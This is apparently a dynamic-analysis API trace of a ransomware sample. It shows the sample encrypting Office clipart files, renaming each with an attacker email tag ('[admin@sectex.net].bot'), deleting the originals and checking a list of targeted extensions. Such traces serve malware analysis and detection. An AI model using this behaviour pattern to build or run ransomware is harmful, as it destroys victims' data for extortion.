	[0152.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0152.462] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.462] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0152.463] GetLastError () returned 0x0
	[0152.463] ReadFile (in: hFile=0x3fc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3b29, lpOverlapped=0x0) returned 1
	[0152.489] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3b30, lpOverlapped=0x0) returned 1
	[0152.490] ReadFile (in: hFile=0x3fc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.490] WriteFile (in: hFile=0x3e8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.490] SetEndOfFile (hFile=0x3e8) returned 1
	[0152.490] CloseHandle (hObject=0x3e8) returned 1
	[0152.490] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.490] SetEndOfFile (hFile=0x3fc) returned 1
	[0152.492] CloseHandle (hObject=0x3fc) returned 1
	[0152.492] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg")) returned 1
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString=".doc") returned 4
	[0152.571] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.571] lstrlenW (lpString=".docx") returned 5
	[0152.571] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0152.571] lstrlenW (lpString=".pdf") returned 4
	[0152.571] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.571] lstrlenW (lpString=".xls") returned 4
	[0152.571] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.571] lstrlenW (lpString=".xlsx") returned 5
	[0152.571] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0152.571] lstrlenW (lpString=".ppt") returned 4
	[0152.571] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString=".zip") returned 4
	[0152.571] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.571] lstrlenW (lpString=".rar") returned 4
	[0152.571] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.571] lstrlenW (lpString=".bz2") returned 4
	[0152.571] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.571] lstrlenW (lpString=".7z") returned 3
	[0152.571] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString=".dbf") returned 4
	[0152.571] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString=".1cd") returned 4
	[0152.571] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.571] lstrlenW (lpString=".jpg") returned 4
	[0152.572] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.572] lstrlenW (lpString=".doc") returned 4
	[0152.572] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0152.572] lstrlenW (lpString=".docx") returned 5
	[0152.572] lstrcmpiW (lpString1=".docx", lpString2="0.JPG") returned -1
	[0152.572] lstrlenW (lpString=".pdf") returned 4
	[0152.572] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0152.572] lstrlenW (lpString=".xls") returned 4
	[0152.572] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0152.572] lstrlenW (lpString=".xlsx") returned 5
	[0152.572] lstrcmpiW (lpString1=".xlsx", lpString2="0.JPG") returned -1
	[0152.572] lstrlenW (lpString=".ppt") returned 4
	[0152.572] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.572] lstrlenW (lpString=".zip") returned 4
	[0152.572] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0152.572] lstrlenW (lpString=".rar") returned 4
	[0152.572] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0152.572] lstrlenW (lpString=".bz2") returned 4
	[0152.572] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0152.572] lstrlenW (lpString=".7z") returned 3
	[0152.572] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.572] lstrlenW (lpString=".dbf") returned 4
	[0152.572] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.572] lstrlenW (lpString=".1cd") returned 4
	[0152.572] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0152.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 63
	[0152.573] lstrlenW (lpString=".jpg") returned 4
	[0152.573] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0152.573] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.573] lstrlenW (lpString="J0099171.WMF") returned 12
	[0152.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.573] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8754) returned 1
	[0152.573] CloseHandle (hObject=0x3f8) returned 1
	[0152.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf")) returned 0x20
	[0152.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0152.574] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.574] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0152.574] GetLastError () returned 0x0
	[0152.574] ReadFile (in: hFile=0x3f8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2232, lpOverlapped=0x0) returned 1
	[0152.600] WriteFile (in: hFile=0x3c8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2240, lpOverlapped=0x0) returned 1
	[0152.601] ReadFile (in: hFile=0x3f8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.601] WriteFile (in: hFile=0x3c8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.601] SetEndOfFile (hFile=0x3c8) returned 1
	[0152.601] CloseHandle (hObject=0x3c8) returned 1
	[0152.601] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.601] SetEndOfFile (hFile=0x3f8) returned 1
	[0152.604] CloseHandle (hObject=0x3f8) returned 1
	[0152.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099171.wmf")) returned 1
	[0152.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.605] lstrlenW (lpString=".doc") returned 4
	[0152.605] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.605] lstrlenW (lpString=".docx") returned 5
	[0152.605] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0152.605] lstrlenW (lpString=".pdf") returned 4
	[0152.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.605] lstrlenW (lpString=".xls") returned 4
	[0152.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.606] lstrlenW (lpString=".xlsx") returned 5
	[0152.606] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0152.606] lstrlenW (lpString=".ppt") returned 4
	[0152.606] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.606] lstrlenW (lpString=".zip") returned 4
	[0152.606] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.606] lstrlenW (lpString=".rar") returned 4
	[0152.606] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString=".bz2") returned 4
	[0152.606] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString=".7z") returned 3
	[0152.606] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.606] lstrlenW (lpString=".dbf") returned 4
	[0152.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.606] lstrlenW (lpString=".1cd") returned 4
	[0152.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.606] lstrlenW (lpString=".jpg") returned 4
	[0152.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString=".doc") returned 4
	[0152.607] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString=".docx") returned 5
	[0152.607] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0152.607] lstrlenW (lpString=".pdf") returned 4
	[0152.607] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString=".xls") returned 4
	[0152.607] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.607] lstrlenW (lpString=".xlsx") returned 5
	[0152.607] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0152.607] lstrlenW (lpString=".ppt") returned 4
	[0152.607] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString=".zip") returned 4
	[0152.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.607] lstrlenW (lpString=".rar") returned 4
	[0152.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString=".bz2") returned 4
	[0152.607] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString=".7z") returned 3
	[0152.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString=".dbf") returned 4
	[0152.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString=".1cd") returned 4
	[0152.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099171.WMF") returned 63
	[0152.607] lstrlenW (lpString=".jpg") returned 4
	[0152.607] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.608] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.608] lstrlenW (lpString="J0099173.WMF") returned 12
	[0152.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.615] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=37140) returned 1
	[0152.615] CloseHandle (hObject=0x3b0) returned 1
	[0152.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf")) returned 0x20
	[0152.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.616] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.616] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0152.617] GetLastError () returned 0x0
	[0152.617] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x9114, lpOverlapped=0x0) returned 1
	[0152.619] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x9120, lpOverlapped=0x0) returned 1
	[0152.621] ReadFile (in: hFile=0x3b0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.621] WriteFile (in: hFile=0x3dc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0152.621] SetEndOfFile (hFile=0x3dc) returned 1
	[0152.621] CloseHandle (hObject=0x3dc) returned 1
	[0152.621] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.621] SetEndOfFile (hFile=0x3b0) returned 1
	[0152.624] CloseHandle (hObject=0x3b0) returned 1
	[0152.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099173.wmf")) returned 1
	[0152.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.628] lstrlenW (lpString=".doc") returned 4
	[0152.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString=".docx") returned 5
	[0152.628] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0152.628] lstrlenW (lpString=".pdf") returned 4
	[0152.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString=".xls") returned 4
	[0152.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.628] lstrlenW (lpString=".xlsx") returned 5
	[0152.628] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0152.628] lstrlenW (lpString=".ppt") returned 4
	[0152.628] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.628] lstrlenW (lpString=".zip") returned 4
	[0152.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.628] lstrlenW (lpString=".rar") returned 4
	[0152.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString=".bz2") returned 4
	[0152.628] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString=".7z") returned 3
	[0152.628] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.628] lstrlenW (lpString=".dbf") returned 4
	[0152.628] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.628] lstrlenW (lpString=".1cd") returned 4
	[0152.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.629] lstrlenW (lpString=".jpg") returned 4
	[0152.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.629] lstrlenW (lpString=".doc") returned 4
	[0152.629] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString=".docx") returned 5
	[0152.629] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0152.629] lstrlenW (lpString=".pdf") returned 4
	[0152.629] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString=".xls") returned 4
	[0152.629] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0152.629] lstrlenW (lpString=".xlsx") returned 5
	[0152.629] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0152.629] lstrlenW (lpString=".ppt") returned 4
	[0152.629] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.629] lstrlenW (lpString=".zip") returned 4
	[0152.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0152.629] lstrlenW (lpString=".rar") returned 4
	[0152.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString=".bz2") returned 4
	[0152.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0152.629] lstrlenW (lpString=".7z") returned 3
	[0152.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0152.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.629] lstrlenW (lpString=".dbf") returned 4
	[0152.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0152.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.630] lstrlenW (lpString=".1cd") returned 4
	[0152.630] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0152.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099173.WMF") returned 63
	[0152.630] lstrlenW (lpString=".jpg") returned 4
	[0152.630] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0152.630] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0152.630] lstrlenW (lpString="J0099174.WMF") returned 12
	[0152.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0152.630] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6214) returned 1
	[0152.630] CloseHandle (hObject=0x3b0) returned 1
	[0152.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf")) returned 0x20
	[0152.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099174.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099174.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
